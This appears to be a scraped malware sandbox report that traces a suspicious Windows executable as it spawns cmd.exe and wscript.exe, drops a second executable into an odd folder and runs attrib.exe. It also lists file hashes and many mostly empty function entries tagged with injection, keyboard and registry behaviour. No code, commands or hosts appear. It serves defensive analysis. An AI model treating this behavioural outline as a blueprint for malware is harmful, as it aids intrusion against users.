| 2023-10-24 04:55:36 UTC | 4760 | IN | |
| 2023-10-24 04:55:36 UTC | 4768 | IN | |
| 2023-10-24 04:55:36 UTC | 4776 | IN | |
| 2023-10-24 04:55:36 UTC | 4784 | IN | |
| 2023-10-24 04:55:36 UTC | 4791 | IN | |
| 2023-10-24 04:55:36 UTC | 4799 | IN | |
| 2023-10-24 04:55:36 UTC | 4807 | IN | |
| 2023-10-24 04:55:36 UTC | 4815 | IN | |
| 2023-10-24 04:55:36 UTC | 4823 | IN | |
| 2023-10-24 04:55:36 UTC | 4830 | IN | |
| 2023-10-24 04:55:36 UTC | 4838 | IN | |
| 2023-10-24 04:55:36 UTC | 4846 | IN | |
| 2023-10-24 04:55:36 UTC | 4854 | IN | |
| 2023-10-24 04:55:36 UTC | 4862 | IN | |
| 2023-10-24 04:55:36 UTC | 4869 | IN | |
| 2023-10-24 04:55:36 UTC | 4877 | IN | |
| 2023-10-24 04:55:36 UTC | 4885 | IN | |
| 2023-10-24 04:55:36 UTC | 4893 | IN | |
| 2023-10-24 04:55:36 UTC | 4901 | IN | |
| 2023-10-24 04:55:36 UTC | 4909 | IN | |
| 2023-10-24 04:55:36 UTC | 4916 | IN | |
| 2023-10-24 04:55:36 UTC | 4924 | IN | |
| 2023-10-24 04:55:36 UTC | 4932 | IN | |
| 2023-10-24 04:55:36 UTC | 4940 | IN | |
| 2023-10-24 04:55:36 UTC | 4948 | IN | |
| 2023-10-24 04:55:36 UTC | 4955 | IN | |
| 2023-10-24 04:55:36 UTC | 4963 | IN | |
| 2023-10-24 04:55:36 UTC | 4971 | IN | |
| 2023-10-24 04:55:36 UTC | 4979 | IN | |
| 2023-10-24 04:55:36 UTC | 4987 | IN | |
| 2023-10-24 04:55:36 UTC | 4994 | IN | |
| 2023-10-24 04:55:36 UTC | 5002 | IN | |
| 2023-10-24 04:55:36 UTC | 5010 | IN | |
| 2023-10-24 04:55:36 UTC | 5018 | IN |
Click to jump to process
Click to jump to process
back
Click to dive into process behavior distribution
Click to jump to process
| Target ID: | 0 |
| Start time: | 06:55:15 |
| Start date: | 24/10/2023 |
| Path: | C:\Users\user\Desktop\dGuYmJNS1K.exe |
| Wow64 process (32bit): | true |
| Commandline: | |
| Imagebase: | 0xfe0000 |
| File size: | 1'049'600 bytes |
| MD5 hash: | 897AF5616BFD6AF5B687876924F39EE3 |
| Has elevated privileges: | true |
| Has administrator privileges: | true |
| Programmed in: | C, C++ or other language |
| Reputation: | low |
| Has exited: | true |
| Target ID: | 1 |
| Start time: | 06:55:15 |
| Start date: | 24/10/2023 |
| Path: | C:\Windows\SysWOW64\cmd.exe |
| Wow64 process (32bit): | true |
| Commandline: | |
| Imagebase: | 0x240000 |
| File size: | 236'544 bytes |
| MD5 hash: | D0FCE3AFA6AA1D58CE9FA336CC2B675B |
| Has elevated privileges: | true |
| Has administrator privileges: | true |
| Programmed in: | C, C++ or other language |
| Reputation: | high |
| Has exited: | true |
| Target ID: | 2 |
| Start time: | 06:55:15 |
| Start date: | 24/10/2023 |
| Path: | C:\Windows\System32\conhost.exe |
| Wow64 process (32bit): | false |
| Commandline: | |
| Imagebase: | 0x7ff7699e0000 |
| File size: | 862'208 bytes |
| MD5 hash: | 0D698AF330FD17BEE3BF90011D49251D |
| Has elevated privileges: | true |
| Has administrator privileges: | true |
| Programmed in: | C, C++ or other language |
| Reputation: | high |
| Has exited: | true |
| Target ID: | 3 |
| Start time: | 06:55:15 |
| Start date: | 24/10/2023 |
| Path: | C:\Windows\SysWOW64\cmd.exe |
| Wow64 process (32bit): | true |
| Commandline: | |
| Imagebase: | 0x240000 |
| File size: | 236'544 bytes |
| MD5 hash: | D0FCE3AFA6AA1D58CE9FA336CC2B675B |
| Has elevated privileges: | true |
| Has administrator privileges: | true |
| Programmed in: | C, C++ or other language |
| Reputation: | high |
| Has exited: | true |
| Target ID: | 4 |
| Start time: | 06:55:15 |
| Start date: | 24/10/2023 |
| Path: | C:\Windows\SysWOW64\cmd.exe |
| Wow64 process (32bit): | true |
| Commandline: | |
| Imagebase: | 0x240000 |
| File size: | 236'544 bytes |
| MD5 hash: | D0FCE3AFA6AA1D58CE9FA336CC2B675B |
| Has elevated privileges: | true |
| Has administrator privileges: | true |
| Programmed in: | C, C++ or other language |
| Reputation: | high |
| Has exited: | true |
| Target ID: | 5 |
| Start time: | 06:55:16 |
| Start date: | 24/10/2023 |
| Path: | C:\Windows\SysWOW64\cmd.exe |
| Wow64 process (32bit): | true |
| Commandline: | |
| Imagebase: | 0x240000 |
| File size: | 236'544 bytes |
| MD5 hash: | D0FCE3AFA6AA1D58CE9FA336CC2B675B |
| Has elevated privileges: | true |
| Has administrator privileges: | true |
| Programmed in: | C, C++ or other language |
| Reputation: | high |
| Has exited: | true |
| Target ID: | 6 |
| Start time: | 06:55:16 |
| Start date: | 24/10/2023 |
| Path: | C:\Windows\SysWOW64\cmd.exe |
| Wow64 process (32bit): | true |
| Commandline: | |
| Imagebase: | 0x240000 |
| File size: | 236'544 bytes |
| MD5 hash: | D0FCE3AFA6AA1D58CE9FA336CC2B675B |
| Has elevated privileges: | true |
| Has administrator privileges: | true |
| Programmed in: | C, C++ or other language |
| Reputation: | high |
| Has exited: | true |
| Target ID: | 7 |
| Start time: | 06:55:16 |
| Start date: | 24/10/2023 |
| Path: | C:\Windows\SysWOW64\cmd.exe |
| Wow64 process (32bit): | true |
| Commandline: | |
| Imagebase: | 0x240000 |
| File size: | 236'544 bytes |
| MD5 hash: | D0FCE3AFA6AA1D58CE9FA336CC2B675B |
| Has elevated privileges: | true |
| Has administrator privileges: | true |
| Programmed in: | C, C++ or other language |
| Reputation: | high |
| Has exited: | true |
| Target ID: | 8 |
| Start time: | 06:55:16 |
| Start date: | 24/10/2023 |
| Path: | C:\Windows\SysWOW64\wscript.exe |
| Wow64 process (32bit): | true |
| Commandline: | |
| Imagebase: | 0x3f0000 |
| File size: | 147'456 bytes |
| MD5 hash: | FF00E0480075B095948000BDC66E81F0 |
| Has elevated privileges: | true |
| Has administrator privileges: | true |
| Programmed in: | C, C++ or other language |
| Reputation: | moderate |
| Has exited: | true |
| Target ID: | 12 |
| Start time: | 06:55:38 |
| Start date: | 24/10/2023 |
| Path: | C:\wql455oi0\ef2dsio342ai.exe |
| Wow64 process (32bit): | true |
| Commandline: | |
| Imagebase: | 0xd10000 |
| File size: | 947'288 bytes |
| MD5 hash: | 0ADB9B817F1DF7807576C2D7068DD931 |
| Has elevated privileges: | true |
| Has administrator privileges: | true |
| Programmed in: | C, C++ or other language |
| Yara matches: |
|
| Reputation: | moderate |
| Has exited: | true |
| Target ID: | 13 |
| Start time: | 06:55:39 |
| Start date: | 24/10/2023 |
| Path: | C:\Windows\SysWOW64\attrib.exe |
| Wow64 process (32bit): | true |
| Commandline: | |
| Imagebase: | 0xd00000 |
| File size: | 19'456 bytes |
| MD5 hash: | 0E938DD280E83B1596EC6AA48729C2B0 |
| Has elevated privileges: | true |
| Has administrator privileges: | true |
| Programmed in: | C, C++ or other language |
| Yara matches: |
|
| Has exited: | false |
Execution Graph
| Execution Coverage: | 5.6% |
| Dynamic/Decrypted Code Coverage: | 0% |
| Signature Coverage: | 1.5% |
| Total number of Nodes: | 1585 |
| Total number of Limit Nodes: | 34 |
Graph
Function 00FE1000 Relevance: 33.4, APIs: 15, Strings: 4, Instructions: 122windowregistryCOMMON
Download Yara Rule
Control-flow Graph
| APIs |
|
| Strings |
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
| Uniqueness |
Uniqueness Score: -1.00% |
Function 00FE1180 Relevance: 29.9, APIs: 13, Strings: 4, Instructions: 161windowCOMMON
Download Yara Rule
Control-flow Graph
| APIs |
|
| Strings |
|
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
| Uniqueness |
Uniqueness Score: -1.00% |
Function 00FE6166 Relevance: 16.7, APIs: 11, Instructions: 188synchronizationCOMMON
Download Yara Rule
Control-flow Graph
| APIs |
|
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
| Uniqueness |
Uniqueness Score: -1.00% |
Control-flow Graph
| APIs |
|
| Strings |
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
| Uniqueness |
Uniqueness Score: -1.00% |
Control-flow Graph
| APIs |
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
| Uniqueness |
Uniqueness Score: -1.00% |
Function 00FE82C8 Relevance: 3.0, APIs: 2, Instructions: 37COMMON
Download Yara Rule
Control-flow Graph
| APIs |
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
| Uniqueness |
Uniqueness Score: -1.00% |
Function 00FEACFD Relevance: 1.6, APIs: 1, Instructions: 89processCOMMON
Download Yara Rule
Control-flow Graph
| APIs |
|
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
| Uniqueness |
Uniqueness Score: -1.00% |
Function 00FE728B Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE
Download Yara Rule
Control-flow Graph
| APIs |
|
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
| Uniqueness |
Uniqueness Score: -1.00% |
Function 00FE8E93 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMON
Download Yara Rule
Control-flow Graph
| APIs |
|
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
| Uniqueness |
Uniqueness Score: -1.00% |
Function 00FE756C Relevance: 6.1, APIs: 4, Instructions: 129fileCOMMON
Download Yara Rule
| APIs |
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
| Uniqueness |
Uniqueness Score: -1.00% |
Function 00FE1A8E Relevance: 6.1, APIs: 4, Instructions: 73COMMON
Download Yara Rule
| APIs |
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
| Uniqueness |
Uniqueness Score: -1.00% |
| APIs |
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
| Uniqueness |
Uniqueness Score: -1.00% |
| APIs |
|
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
| Uniqueness |
Uniqueness Score: -1.00% |
Function 00FE1D35 Relevance: 1.6, APIs: 1, Instructions: 147COMMON
Download Yara Rule
| APIs |
|
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
| Uniqueness |
Uniqueness Score: -1.00% |
Function 00FE1C21 Relevance: 1.5, APIs: 1, Instructions: 3COMMON
Download Yara Rule
| APIs |
|
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
| Uniqueness |
Uniqueness Score: -1.00% |
Function 00FE98ED Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON
Download Yara Rule
| APIs |
|
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
| Uniqueness |
Uniqueness Score: -1.00% |
| Strings |
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
| Uniqueness |
Uniqueness Score: -1.00% |
Function 00FE353B Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 303COMMONLIBRARYCODE
Download Yara Rule
| APIs |
| Strings |
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
| Uniqueness |
Uniqueness Score: -1.00% |
Function 00FEC922 Relevance: 12.2, APIs: 8, Instructions: 248COMMON
Download Yara Rule
| APIs |
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
| Uniqueness |
Uniqueness Score: -1.00% |
| APIs |
| Strings |
|
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
| Uniqueness |
Uniqueness Score: -1.00% |
Function 00FE9452 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 74COMMONLIBRARYCODE
Download Yara Rule
| APIs |
|
| Strings |
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
| Uniqueness |
Uniqueness Score: -1.00% |
| APIs |
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
| Uniqueness |
Uniqueness Score: -1.00% |
Function 00FE4F6A Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42libraryloaderCOMMONLIBRARYCODE
Download Yara Rule
| APIs |
|
| Strings |
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
| Uniqueness |
Uniqueness Score: -1.00% |
Function 00FEB3D0 Relevance: 7.7, APIs: 5, Instructions: 197COMMON
Download Yara Rule
| APIs |
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
| Uniqueness |
Uniqueness Score: -1.00% |
Function 00FE2833 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27libraryCOMMONLIBRARYCODE
Download Yara Rule
| APIs |
|
| Strings |
|
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
| Uniqueness |
Uniqueness Score: -1.00% |
| APIs |
|
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
| Uniqueness |
Uniqueness Score: -1.00% |
| APIs |
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
| Uniqueness |
Uniqueness Score: -1.00% |
Function 00FE8228 Relevance: 6.1, APIs: 4, Instructions: 74COMMON
Download Yara Rule
| APIs |
|
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
| Uniqueness |
Uniqueness Score: -1.00% |
| APIs |
|
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
| Uniqueness |
Uniqueness Score: -1.00% |
Function 00FE38E0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112COMMONLIBRARYCODE
Download Yara Rule
| APIs |
|
| Strings |
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
| Uniqueness |
Uniqueness Score: -1.00% |
Execution Graph
| Execution Coverage: | 3.7% |
| Dynamic/Decrypted Code Coverage: | 100% |
| Signature Coverage: | 2.1% |
| Total number of Nodes: | 2000 |
| Total number of Limit Nodes: | 91 |
Graph
Function 10001950 Relevance: 38.7, APIs: 21, Strings: 1, Instructions: 166sleepthreadinjectionCOMMON
Download Yara Rule
Control-flow Graph
| APIs |
|
| Strings |
|
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
| Uniqueness |
Uniqueness Score: -1.00% |
Function 10001CB0 Relevance: 26.6, APIs: 11, Strings: 4, Instructions: 388sleepCOMMON
Download Yara Rule
Control-flow Graph
| APIs |
|
| Strings |
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
| Uniqueness |
Uniqueness Score: -1.00% |
Function 00D15D78 Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 235libraryloaderCOMMON
Download Yara Rule
Control-flow Graph
| APIs |
|
| Strings |
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
| Uniqueness |
Uniqueness Score: -1.00% |
Function 00D13312 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 148windowCOMMON
Download Yara Rule
Control-flow Graph
| APIs |
|
| Strings |
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
| Uniqueness |
Uniqueness Score: -1.00% |
Function 100022B0 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 70fileCOMMON
Download Yara Rule
Control-flow Graph
| APIs |
| Strings |
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
| Uniqueness |
Uniqueness Score: -1.00% |
Function 10001B50 Relevance: 6.1, APIs: 4, Instructions: 71COMMON
Download Yara Rule
| APIs |
|
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
| Uniqueness |
Uniqueness Score: -1.00% |
| APIs |
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
| Uniqueness |
Uniqueness Score: -1.00% |
| APIs |
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
| Uniqueness |
Uniqueness Score: -1.00% |
| APIs |
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
| Uniqueness |
Uniqueness Score: -1.00% |
| APIs |
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
| Uniqueness |
Uniqueness Score: -1.00% |
Function 10006874 Relevance: 3.0, APIs: 2, Instructions: 28COMMON
Download Yara Rule
| APIs |
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
| Uniqueness |
Uniqueness Score: -1.00% |
Function 00D1EE0B Relevance: 21.6, APIs: 14, Instructions: 609windowsleeptimeCOMMON
Download Yara Rule
| APIs |
|
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
| Uniqueness |
Uniqueness Score: -1.00% |
Function 10001E68 Relevance: 21.3, APIs: 9, Strings: 3, Instructions: 347sleepCOMMON
Download Yara Rule
Control-flow Graph
| APIs |
|
| Strings |
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
| Uniqueness |
Uniqueness Score: -1.00% |
Function 00D135AB Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 53windowregistryCOMMON
Download Yara Rule
Control-flow Graph
| APIs |
|
| Strings |
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
| Uniqueness |
Uniqueness Score: -1.00% |
Function 00D509FB Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272COMMONLIBRARYCODE
Download Yara Rule
Control-flow Graph
| APIs |
|
| Strings |
|
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
| Uniqueness |
Uniqueness Score: -1.00% |
Function 00D1522E Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201registryCOMMON
Download Yara Rule
Control-flow Graph
| APIs |
|
| Strings |
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
| Uniqueness |
Uniqueness Score: -1.00% |
Function 00D1345A Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 63windowregistryCOMMON
Download Yara Rule
Control-flow Graph
| APIs |
|
| Strings |
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
| Uniqueness |
Uniqueness Score: -1.00% |
Function 00D13696 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 145windowtimeregistryCOMMON
Download Yara Rule
Control-flow Graph
| APIs |
|
| Strings |
|
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
| Uniqueness |
Uniqueness Score: -1.00% |
Function 00D12A52 Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 332comCOMMON
Download Yara Rule
Control-flow Graph
| APIs |
| Strings |
|
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
| Uniqueness |
Uniqueness Score: -1.00% |
Control-flow Graph
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
| Uniqueness |
Uniqueness Score: -1.00% |
Control-flow Graph
| APIs |
|
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
| Uniqueness |
Uniqueness Score: -1.00% |
Control-flow Graph
| APIs |
|
| Strings |
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
| Uniqueness |
Uniqueness Score: -1.00% |
Function 00D15F59 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 122windowCOMMON
Download Yara Rule
| APIs |
| Strings |
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
| Uniqueness |
Uniqueness Score: -1.00% |
Function 00D155F8 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58registryCOMMON
Download Yara Rule
| APIs |
|
| Strings |
|
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
| Uniqueness |
Uniqueness Score: -1.00% |
| Strings |
|
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
| Uniqueness |
Uniqueness Score: -1.00% |
Function 00D202F0 Relevance: 5.7, APIs: 3, Instructions: 1236COMMON
Download Yara Rule
| APIs |
|
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
| Uniqueness |
Uniqueness Score: -1.00% |
| APIs |
| Strings |
|
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
| Uniqueness |
Uniqueness Score: -1.00% |
Function 00D988B6 Relevance: 4.9, APIs: 3, Instructions: 430COMMON
Download Yara Rule
| APIs |
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
| Uniqueness |
Uniqueness Score: -1.00% |
Function 00D12735 Relevance: 4.7, APIs: 3, Instructions: 153comCOMMON
Download Yara Rule
| APIs |
|
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
| Uniqueness |
Uniqueness Score: -1.00% |
| APIs |
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
| Uniqueness |
Uniqueness Score: -1.00% |
| APIs |
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
| Uniqueness |
Uniqueness Score: -1.00% |
| APIs |
|
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
| Uniqueness |
Uniqueness Score: -1.00% |
Function 00D4D1E0 Relevance: 4.5, APIs: 3, Instructions: 37COMMON
Download Yara Rule
| APIs |
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
| Uniqueness |
Uniqueness Score: -1.00% |
| APIs |
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
| Uniqueness |
Uniqueness Score: -1.00% |
| APIs |
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
| Uniqueness |
Uniqueness Score: -1.00% |
| APIs |
|
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
| Uniqueness |
Uniqueness Score: -1.00% |
| APIs |
|
| Strings |
|
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
| Uniqueness |
Uniqueness Score: -1.00% |
| APIs |
| Strings |
|
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
| Uniqueness |
Uniqueness Score: -1.00% |
Function 00D138F2 Relevance: 3.1, APIs: 2, Instructions: 77windowCOMMON
Download Yara Rule
| APIs |
|
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
| Uniqueness |
Uniqueness Score: -1.00% |
Function 00D132A2 Relevance: 3.0, APIs: 2, Instructions: 30COMMON
Download Yara Rule
| APIs |
|
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
| Uniqueness |
Uniqueness Score: -1.00% |
Function 00D1CA50 Relevance: 2.1, APIs: 1, Instructions: 587COMMON
Download Yara Rule
| APIs |
|
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
| Uniqueness |
Uniqueness Score: -1.00% |
Function 00D961FF Relevance: 1.7, APIs: 1, Instructions: 205COMMON
Download Yara Rule
| APIs |
|
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
| Uniqueness |
Uniqueness Score: -1.00% |
Function 00D3F126 Relevance: 1.7, APIs: 1, Instructions: 151COMMON
Download Yara Rule
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
| Uniqueness |
Uniqueness Score: -1.00% |
Function 00D7FBCA Relevance: 1.6, APIs: 1, Instructions: 136COMMON
Download Yara Rule
| APIs |
|
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
| Uniqueness |
Uniqueness Score: -1.00% |
| APIs |
|
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
| Uniqueness |
Uniqueness Score: -1.00% |
Function 100048B2 Relevance: 1.6, APIs: 1, Instructions: 72COMMON
Download Yara Rule
| APIs |
|
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
| Uniqueness |
Uniqueness Score: -1.00% |
Function 00D1636D Relevance: 1.6, APIs: 1, Instructions: 65libraryCOMMON
Download Yara Rule
| APIs |
|
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
| Uniqueness |
Uniqueness Score: -1.00% |
Function 00D48792 Relevance: 1.6, APIs: 1, Instructions: 54COMMON
Download Yara Rule
| APIs |
|
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
| Uniqueness |
Uniqueness Score: -1.00% |
Function 00D141E6 Relevance: 1.6, APIs: 1, Instructions: 51COMMON
Download Yara Rule
| APIs |
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
| Uniqueness |
Uniqueness Score: -1.00% |
Function 00D3E992 Relevance: 1.5, APIs: 1, Instructions: 46COMMON
Download Yara Rule
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
| Uniqueness |
Uniqueness Score: -1.00% |
Function 00D1B25F Relevance: 1.5, APIs: 1, Instructions: 43COMMON
Download Yara Rule
| APIs |
|
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
| Uniqueness |
Uniqueness Score: -1.00% |
| APIs |
|
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
| Uniqueness |
Uniqueness Score: -1.00% |
Function 00D43BB0 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
Download Yara Rule
| APIs |
|
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
| Uniqueness |
Uniqueness Score: -1.00% |
Function 00D163DB Relevance: 1.5, APIs: 1, Instructions: 28COMMON
Download Yara Rule
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
| Uniqueness |
Uniqueness Score: -1.00% |
Function 00D1653A Relevance: 1.5, APIs: 1, Instructions: 26COMMON
Download Yara Rule
| APIs |
|
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
| Uniqueness |
Uniqueness Score: -1.00% |
Function 00D1388E Relevance: 1.5, APIs: 1, Instructions: 24windowCOMMON
Download Yara Rule
| APIs |
|
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
| Uniqueness |
Uniqueness Score: -1.00% |
Function 00D139DE Relevance: 1.5, APIs: 1, Instructions: 23COMMON
Download Yara Rule
| APIs |
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
| Uniqueness |
Uniqueness Score: -1.00% |
| APIs |
|
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
| Uniqueness |
Uniqueness Score: -1.00% |
Function 100048BB Relevance: 1.5, APIs: 1, Instructions: 10COMMON
Download Yara Rule
| APIs |
|
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
| Uniqueness |
Uniqueness Score: -1.00% |
Function 10005EE6 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
Download Yara Rule
| APIs |
|
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
| Uniqueness |
Uniqueness Score: -1.00% |
Function 00DA9ED5 Relevance: 72.4, APIs: 39, Strings: 2, Instructions: 625windowkeyboardCOMMON
Download Yara Rule
| APIs |
|
| Strings |
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
| Uniqueness |
Uniqueness Score: -1.00% |
Function 00D2FC8A Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 130keyboardthreadwindowCOMMON
Download Yara Rule
| APIs |
|
| Strings |
|
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
| Uniqueness |
Uniqueness Score: -1.00% |
| APIs |
|
| Strings |
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
| Uniqueness |
Uniqueness Score: -1.00% |
| APIs |
|
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
| Uniqueness |
Uniqueness Score: -1.00% |
| APIs |
|
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
| Uniqueness |
Uniqueness Score: -1.00% |
Function 00D872E9 Relevance: 21.4, APIs: 7, Strings: 5, Instructions: 363timefileCOMMON
Download Yara Rule
| APIs |
|
| Strings |
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
| Uniqueness |
Uniqueness Score: -1.00% |
Function 00D89F9F Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 118fileCOMMON
Download Yara Rule
| APIs |
|
| Strings |
|
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
| Uniqueness |
Uniqueness Score: -1.00% |
